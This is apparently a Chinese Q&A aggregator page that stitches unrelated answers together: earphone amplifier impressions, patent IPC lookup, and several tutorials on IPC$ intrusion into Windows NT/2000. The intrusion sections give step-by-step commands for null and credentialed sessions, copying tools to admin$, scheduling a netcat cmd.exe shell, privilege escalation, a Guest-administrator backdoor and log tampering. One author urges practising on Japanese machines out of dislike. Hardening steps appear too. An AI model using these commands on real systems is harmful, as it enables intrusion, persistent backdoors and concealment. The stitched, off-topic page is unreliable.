ipc如何挖礦
『壹』 IPC推力如何
解釋:
還可以,因為除了阻抗,還有個叫靈敏度的東西聽TF10,ie80,ER4PT三個塞子比較,感覺TF10讓IPC直推在這三個當中效果最好,而ER4PT則發揮不盡如人意,同樣的音量大小,ER4PT的出聲小很多,很壓抑、IE80則一般般,頂多發揮六成的水平。
X90 用IPC,除了高頻有些失控 出現齒音外,整體被推得效果還是可以的,能表現出塞子自身的風格 ,人聲利器。MX90的阻抗是64歐。
還有GR07 用IPC直推的話 整體表現平淡無奇,不過毛病,但也不出彩,這個塞子的阻抗是50歐。
『貳』 如何實現IPC漏洞攻擊
IPC漏洞攻擊是一個很早的漏洞了,現在基本不好使了,可以簡單給你介紹幾個命令,用虛擬機實驗一下,千萬別干壞事。
首先,空連接漏洞必須139.445埠打開,如果不打開,那是不成的
一般情況下139埠都是打開的,呵呵。可以通過流光,X-scan等掃描工具來掃一下,如果存在漏洞直接空連接即可
命令:(192.168.0.12這個地址是捏造的)
net use \\192.168.0.12\ipc$ "" /user:administrator
如果成功連接會提示的
net use z: \\192.168.0.12\c$
把對方的c盤隱射到本地的z盤,在我的電腦裡面就可以看到對方的c盤了.
刪除與對方的ipc連接:
net use \\192.168.0.12\ipc$ /del
上傳木馬,控制關機,設定從其,就能隨你操作了,這種就不教你了~呵呵
『叄』 什麼是IPC$連接,如何建立IPC$連接!
網上關於ipc$入侵的文章可謂多如牛毛,而且也不乏優秀之作,攻擊步驟甚至可以說已經成為經典的模式,因此也沒人願意再把這已經成為定式的東西拿出來擺弄.
不過話雖這樣說,但我個人認為這些文章講解的並不詳細,對於第一次接觸ipc$的菜鳥來說,簡單的羅列步驟並不能解答他們的許多迷惑(你隨便找一個hack論壇搜一下ipc,看存在的疑惑有多少).
因此我寫了這篇相當於解惑的教程.想把一些容易混淆,容易迷惑人的問題說清楚,讓大家不要總徘徊在原地!如果你看完這篇帖子仍有疑問,請馬上回復!
二 什麼是ipc$
IPC$(Internet Process Connection)是共享"命名管道"的資源(大家都是這么說的),它是為了讓進程間通信而開放的命名管道,可以通過驗證用戶名和密碼獲得相應的許可權,在遠程管理計算機和查看計算機的共享資源時使用。
利用IPC$,連接者甚至可以與目標主機建立一個空的連接而無需用戶名與密碼(當然,對方機器必須開了ipc$共享,否則你是連接不上的),而利用這個空的連接,連接者還可以得到目標主機上的用戶列表(不過負責的管理員會禁止導出用戶列表的)。
我們總在說ipc$漏洞ipc$漏洞,其實,ipc$並不是真正意義上的漏洞,它是為了方便管理員的遠程管理而開放的遠程網路登陸功能,而且還打開了默認共享,即所有的邏輯盤(c$,d$,e$……)和系統目錄winnt或windows(admin$)。
所有的這些,初衷都是為了方便管理員的管理,但好的初衷並不一定有好的收效,一些別有用心者(到底是什麼用心?我也不知道,代詞一個)會利用IPC$,訪問共享資源,導出用戶列表,並使用一些字典工具,進行密碼探測,寄希望於獲得更高的許可權,從而達到不可告人的目的.
解惑:
1)IPC連接是Windows NT及以上系統中特有的遠程網路登陸功能,其功能相當於Unix中的Telnet,由於IPC$功能需要用到Windows NT中的很多DLL函數,所以不能在Windows 9.x中運行。
也就是說只有nt/2000/xp才可以建立ipc$連接,98/me是不能建立ipc$連接的(但有些朋友說在98下能建立空的連接,不知道是真是假,不過現在都2003年了,建議98的同志換一下系統吧,98不爽的)
2)即使是空連接也不是100%都能建立成功,如果對方關閉了ipc$共享,你仍然無法建立連接
3)並不是說建立了ipc$連接就可以查看對方的用戶列表,因為管理員可以禁止導出用戶列表
三 建立ipc$連接在hack攻擊中的作用
就像上面所說的,即使你建立了一個空的連接,你也可以獲得不少的信息(而這些信息往往是入侵中必不可少的),訪問部分共享,如果你能夠以某一個具有一定許可權的用戶身份登陸的話,那麼你就會得到相應的許可權,顯然,如果你以管理員身份登陸,嘿嘿,就不用我在多說了吧,what u want,u can do!!
(基本上可以總結為獲取目標信息、管理目標進程和服務,上傳木馬並運行,如果是2000server,還可以考慮開啟終端服務方便控制.怎麼樣?夠厲害吧!)
不過你也不要高興的太早,因為管理員的密碼不是那麼好搞到的,雖然會有一些傻傻的管理員用空口令或者弱智密碼,但這畢竟是少數,而且現在不比從前了,隨著人們安全意識的提高,管理員們也愈加小心了,得到管理員密碼會越來越難的:(
因此今後你最大的可能就是以極小的許可權甚至是沒有許可權進行連接,你會慢慢的發現ipc$連接並不是萬能的,甚至在主機不開啟ipc$共享時,你根本就無法連接.
所以我認為,你不要把ipc$入侵當作終極武器,不要認為它戰無不勝,它就像是足球場上射門前的傳球,很少會有致命一擊的效果,但卻是不可缺少的,我覺得這才是ipc$連接在hack入侵中的意義所在.
四 ipc$與空連接,139,445埠,默認共享的關系
以上四者的關系可能是菜鳥很困惑的一個問題,不過大部分文章都沒有進行特別的說明,其實我理解的也不是很透徹,都是在與大家交流中總結出來的.(一個有良好討論氛圍的BBS可以說是菜鳥的天堂)
1)ipc$與空連接:
不需要用戶名與密碼的ipc$連接即為空連接,一旦你以某個用戶或管理員的身份登陸(即以特定的用戶名和密碼進行ipc$連接),自然就不能叫做空連接了.
許多人可能要問了,既然可以空連接,那我以後就空連接好了,為什麼還要費九牛二虎之力去掃描弱口令,呵呵,原因前面提到過,當你以空連接登陸時,你沒有任何許可權(很郁悶吧),而你以用戶或管理員的身份登陸時,你就會有相應的許可權(有許可權誰不想呀,所以還是老老實實掃吧,不要偷懶喲).
2)ipc$與139,445埠:
ipc$連接可以實現遠程登陸及對默認共享的訪問;而139埠的開啟表示netbios協議的應用,我們可以通過139,445(win2000)埠實現對共享文件/列印機的訪問,因此一般來講,ipc$連接是需要139或445埠來支持的.
3)ipc$與默認共享
默認共享是為了方便管理員遠程管理而默認開啟的共享(你當然可以關閉它),即所有的邏輯盤(c$,d$,e$……)和系統目錄winnt或windows(admin$),我們通過ipc$連接可以實現對這些默認共享的訪問(前提是對方沒有關閉這些默認共享)
五 ipc$連接失敗的原因
以下5個原因是比較常見的:
1)你的系統不是NT或以上操作系統;
2)對方沒有打開ipc$默認共享
3)對方未開啟139或445埠(惑被防火牆屏蔽)
4)你的命令輸入有誤(比如缺少了空格等)
5)用戶名或密碼錯誤(空連接當然無所謂了)
另外,你也可以根據返回的錯誤號分析原因:
錯誤號5,拒絕訪問 : 很可能你使用的用戶不是管理員許可權的,先提升許可權;
錯誤號51,Windows 無法找到網路路徑 : 網路有問題;
錯誤號53,找不到網路路徑 : ip地址錯誤;目標未開機;目標lanmanserver服務未啟動;目標有防火牆(埠過濾);
錯誤號67,找不到網路名 : 你的lanmanworkstation服務未啟動;目標刪除了ipc$;
錯誤號1219,提供的憑據與已存在的憑據集沖突 : 你已經和對方建立了一個ipc$,請刪除再連。
錯誤號1326,未知的用戶名或錯誤密碼 : 原因很明顯了;
錯誤號1792,試圖登錄,但是網路登錄服務沒有啟動 : 目標NetLogon服務未啟動。(連接域控會出現此情況)
錯誤號2242,此用戶的密碼已經過期 : 目標有帳號策略,強制定期要求更改密碼。
關於ipc$連不上的問題比較復雜,除了以上的原因,還會有其他一些不確定因素,在此本人無法詳細而確定的說明,就靠大家自己體會和試驗了.
六 如何打開目標的IPC$(此段引自相關文章)
首先你需要獲得一個不依賴於ipc$的shell,比如sql的cmd擴展、telnet、木馬,當然,這shell必須是admin許可權的,然後你可以使用shell執行命令 net share ipc$ 來開放目標的ipc$。從上面可以知道,ipc$能否使用還有很多條件。請確認相關服務都已運行,沒有就啟動它(不知道怎麼做的請看net命令的用法),還是不行的話(比如有防火牆,殺不了)建議放棄。
七 如何防範ipc$入侵
1禁止空連接進行枚舉(此操作並不能阻止空連接的建立,引自《解剖win2000下的空會話》)
首先運行regedit,找到如下組建[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的鍵值改為:00000001(如果設置為2的話,有一些問題會發生,比如一些WIN的服務出現問題等等)
2禁止默認共享
1)察看本地共享資源
運行-cmd-輸入net share
2)刪除共享(每次輸入一個)
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete(如果有e,f,……可以繼續刪除)
3)停止server服務
net stop server /y (重新啟動後server服務會重新開啟)
4)修改注冊表
運行-regedit
server版:找到如下主鍵[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer(DWORD)的鍵值改為:00000000。
pro版:找到如下主鍵[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks(DWORD)的鍵值改為:00000000。
如果上面所說的主鍵不存在,就新建(右擊-新建-雙位元組值)一個主健再改鍵值。
3永久關閉ipc$和默認共享依賴的服務:lanmanserver即server服務
控制面板-管理工具-服務-找到server服務(右擊)-屬性-常規-啟動類型-已禁用
4安裝防火牆(選中相關設置),或者埠過濾(濾掉139,445等),或者用新版本的優化大師
5設置復雜密碼,防止通過ipc$窮舉密碼
(本教程不定期更新,欲獲得最新版本,請登陸官方網站:菜菜鳥社區原創http://ccbirds.yeah.net)
八 相關命令
1)建立空連接:
net use \\IP\ipc$ "" /user:"" (一定要注意:這一行命令中包含了3個空格)
2)建立非空連接:
net use \\IP\ipc$ "用戶名" /user:"密碼" (同樣有3個空格)
3)映射默認共享:
net use z: \\IP\c$ "密碼" /user:"用戶名" (即可將對方的c盤映射為自己的z盤,其他盤類推)
如果已經和目標建立了ipc$,則可以直接用IP+盤符+$訪問,具體命令 net use z: \\IP\c$
4)刪除一個ipc$連接
net use \\IP\ipc$ /del
5)刪除共享映射
net use c: /del 刪除映射的c盤,其他盤類推
net use * /del 刪除全部,會有提示要求按y確認
九 經典入侵模式
這個入侵模式太經典了,大部分ipc教程都有介紹,我也就拿過來引用了,在此感謝原創作者!(不知道是哪位前輩)
1. C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators"
這是用《流光》掃到的用戶名是administrators,密碼為"空"的IP地址(空口令?哇,運氣好到家了),如果是打算攻擊的話,就可以用這樣的命令來與127.0.0.1建立一個連接,因為密碼為"空",所以第一個引號處就不用輸入,後面一個雙引號里的是用戶名,輸入administrators,命令即可成功完成。
2. C:\> srv.exe \\127.0.0.1\admin$
先復制srv.exe上去,在流光的Tools目錄下就有(這里的$是指admin用戶的c:\winnt\system32\,大家還可以使用c$、d$,意思是C盤與D盤,這看你要復制到什麼地方去了)。
3. C:\>net time \\127.0.0.1
查查時間,發現127.0.0.1 的當前時間是 2002/3/19 上午 11:00,命令成功完成。
4. C:\>at \\127.0.0.1 11:05 srv.exe
用at命令啟動srv.exe吧(這里設置的時間要比主機時間快,不然你怎麼啟動啊,呵呵!)
5. C:\>net time \\127.0.0.1
再查查到時間沒有?如果127.0.0.1 的當前時間是 2002/3/19 上午 11:05,那就准備開始下面的命令。
6. C:\>telnet 127.0.0.1 99
這里會用到Telnet命令吧,注意埠是99。Telnet默認的是23埠,但是我們使用的是SRV在對方計算機中為我們建立一個99埠的Shell。
雖然我們可以Telnet上去了,但是SRV是一次性的,下次登錄還要再激活!所以我們打算建立一個Telnet服務!這就要用到ntlm了
7.C:\> ntlm.exe \\127.0.0.1\admin$
用Copy命令把ntlm.exe上傳到主機上(ntlm.exe也是在《流光》的Tools目錄中)。
8. C:\WINNT\system32>ntlm
輸入ntlm啟動(這里的C:\WINNT\system32>指的是對方計算機,運行ntlm其實是讓這個程序在對方計算機上運行)。當出現"DONE"的時候,就說明已經啟動正常。然後使用"net start telnet"來開啟Telnet服務!
9. Telnet 127.0.0.1,接著輸入用戶名與密碼就進入對方了,操作就像在DOS上操作一樣簡單!(然後你想做什麼?想做什麼就做什麼吧,哈哈)
為了以防萬一,我們再把guest激活加到管理組
10. C:\>net user guest /active:yes
將對方的Guest用戶激活
11. C:\>net user guest 1234
將Guest的密碼改為1234,或者你要設定的密碼
12. C:\>net localgroup administrators guest /add
將Guest變為Administrator^_^(如果管理員密碼更改,guest帳號沒改變的話,下次我們可以用guest再次訪問這台計算機)
十 總結:
關於ipc入侵就說這么多了,覺得已經夠詳細了,如果有不準確的地方,希望能與大家討論.
最後,希望大家不要隨便入侵,我寫這篇文章的目的是想解答大家的疑惑,並不是鼓勵大家隨便的入侵,如果你非想試一下,建議拿小日本的機子開練(什麼?為什麼?因為我討厭日本,沒別的)
參考資料:http://www..com/?word=%D2%BB%B7%DD%CF%EA%BE%A1%B5%C4IPC&tn=myie2dg
『肆』 如何關閉IPC
刪除ipc$空連接
在運行內輸入regedit,在注冊表中找到 HKEY-LOCAL_ 項里數值名稱RestrictAnonymous的數值數據由0改為1。
刪除共享(每次輸入一個)
net share admin$ /delete
net share c$ /delete
net share d$ /delete(如果有e,f,……可以繼續刪除)
下面說一下常見的漏洞的埠如何關閉:
1.關閉139埠:右擊網上鄰居--屬性--右擊本地連接--屬性--internet協議/(TCP/IP)--屬性--高級--WINS--禁用TCP/IP上的NETBIOS--確定。
2.右擊-網上鄰居-屬性/本地連接-屬性,在microsoft網路客戶端前的小勾去掉。接著也把microsoft網路的文件和列印機共享的小勾也去掉。
3.關閉445埠:打開注冊表編輯器,在[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters]下增加一個dword鍵項,命名為"SmbDeviceEnabled"(不包含引號),將值設為0。
4。關閉3389埠:右擊我的電腦,點屬性--遠程,把允許從這台計算機發送遠程協助邀請前的勾去掉。
5。關閉135埠:
如何關閉135埠
Windows XP系統
運行dcomcnfg,展開「組件服務」→「計算機」,在「我的電腦」上點右鍵選「屬性」,切換到「默認屬性」,取消「啟用分布式COM」;然後切換到「默認協議」,刪除「面向連接的TCP/IP」。
以上選項有對應的注冊表鍵值,因此也可通過注冊表來修改:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole\EnableDCOM的值改為「N」
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\DCOM Protocols 中刪除「ncacn_ip_tcp」
此外,還需要停用「Distributed Transaction Coordinator」服務。
重啟之後, 135埠就沒有了。
關閉不必須用的服務:
在控制面板中,找到管理工具,在其下面打開服務。將下列的項目開閉:
Server(先禁用,然後再停止掉。)
Telnet(先禁用,然後再停止掉。)
為了您的系統安全,最好將以上兩個危險服務給關閉掉。
把上面那二個服務關閉了,你的問題應該能夠解決
『伍』 IPC空連接怎麼利用啊
1,怎樣建立空連接,它有什麼用。
使用命令 net use \IP\ipc$ "" /user:"" 就可以簡單地和目標建立一個空連接(需要目標開放ipc$)。
對於NT,在默認安全設置下,藉助空連接可以列舉目標用戶、共享,訪問everyone許可權的共享,訪問小部分注冊表等,沒有什麼利用價值。對2000作用就更小了。而且實現也不方便,需藉助工具。
2,為什麼連不上IPC$
1,只有nt/2000/xp及以上系統才可以建立ipc$。如果用的是98/me是沒有該功能的。
2,確認命令沒有打錯。正確的命令是: net use \目標IP\ipc$ "密碼" /user:"用戶名"
注意別多了或少了空格。當用戶名和密碼中不包含空格時兩邊的雙引號可以省略。空密碼用""表示。
3,根據返回的錯誤號分析原因:
錯誤號5,拒絕訪問 : 很可能使用的用戶不是管理員許可權的,先提升許可權;
錯誤號51,Windows 無法找到網路路徑 : 網路有問題;
錯誤號53,找不到網路路徑 : ip地址錯誤;目標未開機;目標lanmanserver服務未啟動;目標有防火牆(埠過濾);
錯誤號67,找不到網路名 : lanmanworkstation服務未啟動;目標刪除了ipc$;
錯誤號1219,提供的憑據與已存在的憑據集沖突 : 已經和對方建立了一個ipc$,請刪除再連。
錯誤號1326,未知的用戶名或錯誤密碼 : 原因很明顯了;
錯誤號1792,試圖登錄,但是網路登錄服務沒
『陸』 開啟ipc共享
網吧 你連得上就怪..
普通內網 還有可能
net use \\ip\ipc$ "密碼" /user:"帳號"
空連接 不需要輸入 帳號 和密碼 用 "" 代替即可
但是許可權很底
關於ipc$、空連接和默認共享問題
首先需要指出的是空連接和ipc$是不同的概念。空連接是在沒有信任的情況下與伺服器建立的會話,換句話說,它是一個到伺服器的匿名訪問。ipc$是為了讓進程間通信而開放的命名管道,可以通過驗證用戶名和密碼獲得相應的許可權。有許多的工具必須用到ipc$。默認共享是為了方便遠程管理而開放的共享,包含了所有的邏輯盤(c$,d$,e$……)和系統目錄winnt或windows(admin$)。
常見問題和回答:
1,怎樣建立空連接,它有什麼用?
使用命令 net use \\IP\ipc$ "" /user:"" 就可以簡單地和目標建立一個空連接(需要目標開放ipc$)。
對於NT,在默認安全設置下,藉助空連接可以列舉目標用戶、共享,訪問everyone許可權的共享,訪問小部分注冊表等,沒有什麼利用價值。對2000作用就更小了。而且實現也不方便,需藉助工具。
2,為什麼我連不上IPC$?
1,只有nt/2000/xp及以上系統才可以建立ipc$。如果你用的是98/me是沒有該功能的。
2,確認你的命令沒有打錯。正確的命令是: net use \\目標IP\ipc$ "密碼" /user:"用戶名"
注意別多了或少了空格。當用戶名和密碼中不包含空格時兩邊的雙引號可以省略。空密碼用""表示。
3,根據返回的錯誤號分析原因:
錯誤號5,拒絕訪問 : 很可能你使用的用戶不是管理員許可權的,先提升許可權;
錯誤號51,Windows 無法找到網路路徑 : 網路有問題;
錯誤號53,找不到網路路徑 : ip地址錯誤;目標未開機;目標lanmanserver服務未啟動;目標有防火牆(埠過濾);
錯誤號67,找不到網路名 : 你的lanmanworkstation服務未啟動;目標刪除了ipc$;
錯誤號1219,提供的憑據與已存在的憑據集沖突 : 你已經和對方建立了一個ipc$,請刪除再連。
錯誤號1326,未知的用戶名或錯誤密碼 : 原因很明顯了;
錯誤號1792,試圖登錄,但是網路登錄服務沒有啟動 : 目標NetLogon服務未啟動。(連接域控會出現此情況)
錯誤號2242,此用戶的密碼已經過期 : 目標有帳號策略,強制定期要求更改密碼。
3,怎樣打開目標的IPC$?
首先你需要獲得一個不依賴於ipc$的shell,比如sql的cmd擴展、telnet、木馬。當然,這shell必須是admin許可權的。然後你可以使用shell執行命令 net share ipc$ 來開放目標的ipc$。從上一問題可以知道,ipc$能否使用還有很多條件。請確認相關服務都已運行,沒有就啟動它(不知道怎麼做的請看net命令的用法)。還是不行的話(比如有防火牆,殺不了)建議放棄。
4,怎樣映射和訪問默認共享?
使用命令 net use z: \\目標IP\c$ "密碼" /user:"用戶名" 將對方的c盤映射為自己的z盤,其他盤類推。
如果已經和目標建立了ipc$,則可以直接用IP加盤符加$訪問。比如 muma.exe \\IP\d$\path\muma.exe 。或者再映射也可以,只是不用用戶名和密碼了:net use y: \\IP\d$ 。然後 muma.exe y:\path\muma.exe 。當路徑中包含空格時,須用""將路徑全引住。
5,如何刪除映射和ipc$連接?
用命令 net use \\IP\ipc$ /del 刪除和一個目標的ipc$連接。
用命令 net use z: /del 刪除映射的z盤,其他盤類推。
用命令 net use * /del 刪除全部。會有提示要求按y確認。
6,連上ipc$然後我能做什麼?
能使用管理員許可權的帳號成功和目標連接ipc$,表示你可以和對方系統做深入「交流」了。你可以使用各種命令行方式的工具(比如pstools系列、Win2000SrvReskit、telnethack等)獲得目標信息、管理目標的進程和服務等。如果目標開放了默認共享(沒開你就幫他開),你就可以上傳木馬並運行。也可以用tftp、ftp的辦法上傳。像dwrcc、VNC、RemoteAdmin等工具(木馬)還具有直接控屏的功能。如果是2000server,還可以考慮開啟終端服務方便控制。這里提到的工具的使用,請看自帶的說明或相關教程。
7,怎樣防止別人用ips$和默認共享入侵我?
A、一種辦法是把ipc$和默認共享都刪除了。但重起後還會有。這就需要改注冊表。
1,先把已有的刪除
net share ipc$ /del
net share admin$ /del
net share c$ /del
…………(有幾個刪幾個)
2,禁止建立空連接
首先運行regedit,找到如下主鍵[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous(DWORD)的鍵值改為:00000001。
3,禁止自動打開默認共享
對於server版,找到如下主鍵[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer(DWORD)的鍵值改為:00000000。
對於pro版,則是[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks(DWORD)的鍵值改為:00000000。
如果上面所說的主鍵不存在,就新建一個再改鍵值。
B、另一種是關閉ipc$和默認共享依賴的服務(不推薦)
net stop lanmanserver
可能會有提示說,XXX服務也會關閉是否繼續。因為還有些次要的服務依賴於lanmanserver。一般情況按y繼續就可以了。
C、最簡單的辦法是設置復雜密碼,防止通過ipc$窮舉密碼。但如果你有其他漏洞,ipc$將為進一步入侵提供方便。
D、還有一個辦法就是裝防火牆,或者埠過濾。防火牆的方法就不說了,埠過濾看這里:
過配置本地策略來禁止139/445埠的連接
『柒』 ipc入侵方法
IPC是Internet Process Connection的縮寫,也就是遠程網路連接。它是Windows NT及Windows 2000特有的一項功能,特點是在同一時間內,兩個IP之間只允許建立一個連接。好了,廢話少說,現在進入主題。
如何找到具有IPC漏洞的主機呢?以前我都是組合一個國外的掃描工具(名字我忘了)和KillUSA的LetMeIn,因為很多工作都是手工完成的,所以速度可想而知了。現在因為有了小榕的流光2000,所以找到這樣的主機實在是太簡單了,具體操作我就不說了,大家可以參考該軟體的說明文檔。
好了,假設我們已經找到了一台這樣的主機,地址是139.223.200.xxx,管理員帳號是Administrator,密碼是123456。進入命令行方式,正式開工。需要說明的是,以下操作都是在目標主機沒有禁止遠程IPC$連接和啟動Schele服務的理想情況下進行的。
F:\>net use \\139.223.200.xxx\ipc$ "123456" /user:"Administrator"
命令成功完成。
F:\> nc.exe \\139.223.200.xxx\admin$
已復制 1 個文件。
F:\>net time \\139.223.200.xxx
\\139.223.200.xxx 的當前時間是 2000/12/25 上午 10:25
在 \\139.223.200.xxx 的本地時間 (GMT - 07:00) 是 2000/12/25 上午10:35
命令成功完成。
F:\>at \\139.223.200.xxx 10:38 nc -l -p 1234 -t -e cmd.exe
新增加了一項作業,其作業 ID = 0
F:\>telnet 139.223.200.xxx 1234
上面的命令很簡單,你只要參考一下net,at和nc的用法就可以了。這樣,我們就登上了遠程的主機。最理想的情況是這樣的,但是,也許你會遇到目標主機的Schele服務沒有啟動的情況,那麼,at命令就不能用了,我們就需要增加以下步驟。
F:\>at \\139.223.200.xxx 10:38 nc -l -p 1234 -t -e cmd.exe
服務仍未啟動。
F:\>netsvc \\139.223.200.xxx schele /start
Service is running on \\139.223.200.xxx
登上遠程主機之後,我們可以做什麼呢?這要視這個帳號的許可權以及該主機的安全策略來決定。如果你的許可權不夠的話,可以試試下面的步驟。首先在本地執行下面的命令。
F:\> getadmin.exe \\139.223.200.xxx\admin$
已復制 1 個文件。
F:\> gasys.dll \\139.223.200.xxx\admin$
已復制 1 個文件。
其次,在遠程主機運行下面的命令。
C:\WINNT\system32>getadmin
如果成功的話,你就是這台主機的管理員了,許可權夠大了吧?:-)
那麼,現在我們能做什麼呢?改主頁?下載SAM資料庫?都可以啦!方法有很多,我就不一一說了,具體方法可以參考相關教程。我一般對目標主機上的WORD文檔和資料庫比較感興趣,呵呵。。。
其實,如果你在這台機子上面放個木馬或者病毒什麼的東東,做起事來更容易一些,但是我覺得如果你跟他沒什麼深仇大恨的話,還是不要這么做了,這樣不好。
作完了你要做的事,不要忘了做個後門。
C:\WINNT\system32>net user Guest 30906766
net use Guest 30906766
The command completed successfully.
C:\WINNT\system32>net localgroup administrators Guest /add
net localgroup administrators Guest /add
The command completed successfully.
這是個比較簡單的後門,要想做的更好一些,可以象Linux那樣,做出一套RootKits來,其實這樣的東東目前已經有了,你只要拿來用就可以了。現在搞破壞真是簡單多了,那麼多的傻瓜工具任你用,哎!要想自保,不學點安全知識怎麼行呢?
最後,我們得修理一下日誌。雖然Redp0wer告訴我很少管理員會看NT的日誌,但是我想修理一下還是有用的。NT的日誌在什麼地方呢?可以參考XUDI的文章。但是有一點要記住的是,日誌只能修改,不能刪除,否則就是自己把自己出賣了!:-)這方面的命令行工具也不少,你可以到一些國外的站點去看看。
其實有了這台主機,你還可以做的更多。
智慧+毅力+靈感=成功,這是我的經驗。
『捌』 如何檢索一個專利的ipc號
可以登陸到國家知識產權局(http://epub.sipo.gov.cn/ipc.jsp)
點擊ipc分類查詢
『玖』 ipc遠程式控制制
1.建立IPC連接net use \IP password /user:administrator2.把Telnet服務改成「自動」sc \IP config tlntsvr start= auto注意:auto前面有一個空格3.啟動Telnet服務sc \IP start tlntsvr4.Telnet到伺服器telnet IP sc start remoteaccess 在注冊表編輯器左欄中依次展開「server1\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server」項目,然後在右欄中找到「fDenyTSConnections」鍵(如圖),雙擊打開後將該鍵值修改為「0」,點擊「確定」按鈕,最後關閉注冊表編輯器。
『拾』 如何建立ipc連接~都來看看 也許有你能回答的~
一份詳盡的IPC$入侵資料
一 嘮叨一下:
網上關於ipc$入侵的文章可謂多如牛毛,而且也不乏優秀之作,攻擊步驟甚至可以說已經成為經典的模式,因此也沒人願意再把這已經成為定式的東西拿出來擺弄.
不過話雖這樣說,但我個人認為這些文章講解的並不詳細,對於第一次接觸ipc$的菜鳥來說,簡單的羅列步驟並不能解答他們的許多迷惑(你隨便找一個hack論壇搜一下ipc,看存在的疑惑有多少).
因此我寫了這篇相當於解惑的教程.想把一些容易混淆,容易迷惑人的問題說清楚,讓大家不要總徘徊在原地!如果你看完這篇帖子仍有疑問,請馬上回復!
二 什麼是ipc$
IPC$(Internet Process Connection)是共享"命名管道"的資源(大家都是這么說的),它是為了讓進程間通信而開放的命名管道,可以通過驗證用戶名和密碼獲得相應的許可權,在遠程管理計算機和查看計算機的共享資源時使用。
利用IPC$,連接者甚至可以與目標主機建立一個空的連接而無需用戶名與密碼(當然,對方機器必須開了ipc$共享,否則你是連接不上的),而利用這個空的連接,連接者還可以得到目標主機上的用戶列表(不過負責的管理員會禁止導出用戶列表的)。
我們總在說ipc$漏洞ipc$漏洞,其實,ipc$並不是真正意義上的漏洞,它是為了方便管理員的遠程管理而開放的遠程網路登陸功能,而且還打開了默認共享,即所有的邏輯盤(c$,d$,e$……)和系統目錄winnt或windows(admin$)。
所有的這些,初衷都是為了方便管理員的管理,但好的初衷並不一定有好的收效,一些別有用心者(到底是什麼用心?我也不知道,代詞一個)會利用IPC$,訪問共享資源,導出用戶列表,並使用一些字典工具,進行密碼探測,寄希望於獲得更高的許可權,從而達到不可告人的目的.
解惑:
1)IPC連接是Windows NT及以上系統中特有的遠程網路登陸功能,其功能相當於Unix中的Telnet,由於IPC$功能需要用到Windows NT中的很多DLL函數,所以不能在Windows 9.x中運行。
也就是說只有nt/2000/xp才可以建立ipc$連接,98/me是不能建立ipc$連接的(但有些朋友說在98下能建立空的連接,不知道是真是假,不過現在都2003年了,建議98的同志換一下系統吧,98不爽的)
2)即使是空連接也不是100%都能建立成功,如果對方關閉了ipc$共享,你仍然無法建立連接
3)並不是說建立了ipc$連接就可以查看對方的用戶列表,因為管理員可以禁止導出用戶列表
三 建立ipc$連接在hack攻擊中的作用
就像上面所說的,即使你建立了一個空的連接,你也可以獲得不少的信息(而這些信息往往是入侵中必不可少的),訪問部分共享,如果你能夠以某一個具有一定許可權的用戶身份登陸的話,那麼你就會得到相應的許可權,顯然,如果你以管理員身份登陸,嘿嘿,就不用我在多說了吧,what u want,u can do!!
(基本上可以總結為獲取目標信息、管理目標進程和服務,上傳木馬並運行,如果是2000server,還可以考慮開啟終端服務方便控制.怎麼樣?夠厲害吧!)
不過你也不要高興的太早,因為管理員的密碼不是那麼好搞到的,雖然會有一些傻傻的管理員用空口令或者弱智密碼,但這畢竟是少數,而且現在不比從前了,隨著人們安全意識的提高,管理員們也愈加小心了,得到管理員密碼會越來越難的:(
因此今後你最大的可能就是以極小的許可權甚至是沒有許可權進行連接,你會慢慢的發現ipc$連接並不是萬能的,甚至在主機不開啟ipc$共享時,你根本就無法連接.
所以我認為,你不要把ipc$入侵當作終極武器,不要認為它戰無不勝,它就像是足球場上射門前的傳球,很少會有致命一擊的效果,但卻是不可缺少的,我覺得這才是ipc$連接在hack入侵中的意義所在.
四 ipc$與空連接,139,445埠,默認共享的關系
以上四者的關系可能是菜鳥很困惑的一個問題,不過大部分文章都沒有進行特別的說明,其實我理解的也不是很透徹,都是在與大家交流中總結出來的.(一個有良好討論氛圍的BBS可以說是菜鳥的天堂)
1)ipc$與空連接:
不需要用戶名與密碼的ipc$連接即為空連接,一旦你以某個用戶或管理員的身份登陸(即以特定的用戶名和密碼進行ipc$連接),自然就不能叫做空連接了.
許多人可能要問了,既然可以空連接,那我以後就空連接好了,為什麼還要費九牛二虎之力去掃描弱口令,呵呵,原因前面提到過,當你以空連接登陸時,你沒有任何許可權(很郁悶吧),而你以用戶或管理員的身份登陸時,你就會有相應的許可權(有許可權誰不想呀,所以還是老老實實掃吧,不要偷懶喲).
2)ipc$與139,445埠:
ipc$連接可以實現遠程登陸及對默認共享的訪問;而139埠的開啟表示netbios協議的應用,我們可以通過139,445(win2000)埠實現對共享文件/列印機的訪問,因此一般來講,ipc$連接是需要139或445埠來支持的.
3)ipc$與默認共享
默認共享是為了方便管理員遠程管理而默認開啟的共享(你當然可以關閉它),即所有的邏輯盤(c$,d$,e$……)和系統目錄winnt或windows(admin$),我們通過ipc$連接可以實現對這些默認共享的訪問(前提是對方沒有關閉這些默認共享)
五 ipc$連接失敗的原因
以下5個原因是比較常見的:
1)你的系統不是NT或以上操作系統;
2)對方沒有打開ipc$默認共享
3)對方未開啟139或445埠(惑被防火牆屏蔽)
4)你的命令輸入有誤(比如缺少了空格等)
5)用戶名或密碼錯誤(空連接當然無所謂了)
另外,你也可以根據返回的錯誤號分析原因:
錯誤號5,拒絕訪問 : 很可能你使用的用戶不是管理員許可權的,先提升許可權;
錯誤號51,Windows 無法找到網路路徑 : 網路有問題;
錯誤號53,找不到網路路徑 : ip地址錯誤;目標未開機;目標lanmanserver服務未啟動;目標有防火牆(埠過濾);
